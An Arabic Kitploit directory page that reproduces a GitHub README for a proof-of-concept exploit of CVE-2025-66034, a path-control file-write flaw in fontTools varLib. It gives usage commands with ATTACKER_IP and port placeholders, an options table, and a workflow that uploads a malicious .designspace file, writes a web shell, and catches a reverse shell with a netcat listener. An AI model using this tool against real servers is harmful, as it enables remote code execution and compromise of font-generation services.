Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
varlib-cve-2025-66034 — استغلال لإثبات المفهوم لثغرة CVE-2025-66034 في خط إنتاج توليد الخطوط المتغيرة في fontTools. يسمح ملف .designspace معدّ خصيصًا بالتحكم في مسار الإخراج، مما يتيح عمليات كتابة ملفات عشوائية. يقوم السكربت بأتمتة إنشاء الحمولة وتوليد الخطوط ورفعها لإثبات المشكلة. | Kitploit
أدوات/GitHubGitHub/symphony2colour/varlib-cve-2025-66034
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليم
GitHubsymphony2colour/varlib-cve-2025-66034

varlib-cve-2025-66034

استغلال لإثبات المفهوم لثغرة CVE-2025-66034 في خط إنتاج توليد الخطوط المتغيرة في fontTools. يسمح ملف .designspace معدّ خصيصًا بالتحكم في مسار الإخراج، مما يتيح عمليات كتابة ملفات عشوائية. يقوم السكربت بأتمتة إنشاء الحمولة وتوليد الخطوط ورفعها لإثبات المشكلة.

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع
2منذ 5 أشهرلم تتم المراجعة بعد

استغلال CVE-2025-66034 في fontTools varLib

cve component vulnerability vector impact language dependency license

لا يقدّم هذا المستودع ثغرة جديدة.

هذا دليلُ إثبات مفهوم (PoC) لاستغلال CVE-2025-66034 الذي يؤثّر على خط إنتاج توليد الخطوط المتغيرة variable font في fontTools varLib.

تتيح الثغرة للمهاجمين التحكم في اسم ملف الإخراج داخل ملف .designspace مصنوع بعناية. وعند معالجته بواسطة خدمة توليد خطوط معرّضة للثغرة، يمكن أن يؤدي ذلك إلى كتابة ملفات عشوائية على نظام ملفات الخادم.

يقوم السكربت varlib_cve_2025_66034.py بأتمتة إنشاء الحمولة وتوليد الخطوط والرفع وتشغيل الصدفة الاختياري.


الميزات

  • إنشاء تلقائي لخطوط رئيسية متوافقة باستخدام fontTools
  • توليد اسم ملف صدفة عشوائي
  • مسار هدف ونقطة رفع قابلة للتخصيص
  • مستمع nc تلقائي
  • لا حاجة لتجهيز الخطوط يدويًا

المتطلبات

Python 3.9+

ثبّت التبعيات:

root@kitploit:~
pip install fonttools requests

Netcat مطلوب للمستمع:


الاستخدام

إذا كان هدفك بيئة معملية مستضافة ذاتيًا تعمل على mysite.com، وكان مسار الرفع ومسار الكتابة على نظام الملفات ومسار التشغيل المتاح عبر الويب مطابقةً للقيم الافتراضية في السكربت، يمكنك تشغيله مباشرة.

الاستخدام الأساسي:

root@kitploit:~
python varlib_cve_2025_66034.py --ip <ATTACKER_IP> --port <ATTACKER_PORT>

من المرجح جدًا أن يستخدم الهدف عناوين URL أو مسارات نظام ملفات مختلفة؛ لذا تجاوز القيم الافتراضية باستخدام الخيارات المتاحة أدناه، مثل --url و--path و--trigger، أو عدّل السكربت يدويًا

ملاحظة: قد تختلف أسماء حقول نموذج الرفع متعدد الأجزاء (multipart) حسب البيئة. إذا كان الهدف لا يستخدم نفس أسماء حقول النموذج الموجودة في السكربت، فقم بتعديلها في قسم files قبل تشغيل الاستغلال.

الخيارات

مثال مع خيارات مخصصة:

root@kitploit:~
python varlib_cve_2025_66034.py --ip <ATTACKER_IP> --port <ATTACKER_PORT> --path /var/www/mysite.com/public --url http://mysite.com/tools/variable-font-generator/process --trigger http://mysite.com

سير عمل الاستغلال

  1. توليد خطوط رئيسية متوافقة
  2. إنشاء ملف .designspace خبيث
  3. رفع الحمولة عبر طلب POST متعدد الأجزاء
  4. كتابة ملف عشوائي على الخادم
  5. تشغيل الحمولة عبر طلب HTTP

الشكر والتقدير

شكر خاص واحترام لكل من:

  • مشرفي مشروع fontTools ومساهميه على عملهم في مكتبة fontTools مفتوحة المصدر.
  • الباحثين الأمنيين الذين اكتشفوا ثغرة CVE-2025-66034 وكشفوا عنها بمسؤولية.
  • مجتمع الأمن مفتوح المصدر لتوثيق وتحليل الثغرات التي تساعد في تحسين أمن البرمجيات.

يُقدَّم دليل إثبات المفهوم هذا لأغراض تعليمية وبحثية للمساعدة في فهم الثغرة وتأثيرها.


إخلاء مسؤولية

يُقدَّم هذا الكود لأغراض تعليمية وبحثية فقط.

لا تستخدم هذا الاستغلال ضد أنظمة لا تملكها أو ليس لديك إذن صريح لاختبارها.

المؤلف غير مسؤول عن أي إساءة استخدام أو ضرر ناتج عن هذا البرنامج.


المراجع

  • تفاصيل CVE: https://nvd.nist.gov/vuln/detail/CVE-2025-66034
  • إشعار GitHub الأمني: https://github.com/advisories/GHSA-768j-98cg-p3fv
  • مشروع fontTools: https://github.com/fonttools/fonttools
  • توثيق fontTools: https://fonttools.readthedocs.io/
تنزيل الأداة
الوسيطالوصف
--ipعنوان IP الخاص بمستمع المهاجم
--portمنفذ المستمع
--pathمسار نظام الملفات الهدف حيث سيتم كتابة الملف (يجب أن يكون متاحًا عبر الويب لتشغيل قشرة ويب)
--urlنقطة نهاية الرفع، وقد يختلف النموذج
--triggerعنوان URL الأساسي المستخدم لتشغيل الحمولة المكتوبة بعد الرفع
--no-listenتعطيل مستمع netcat التلقائي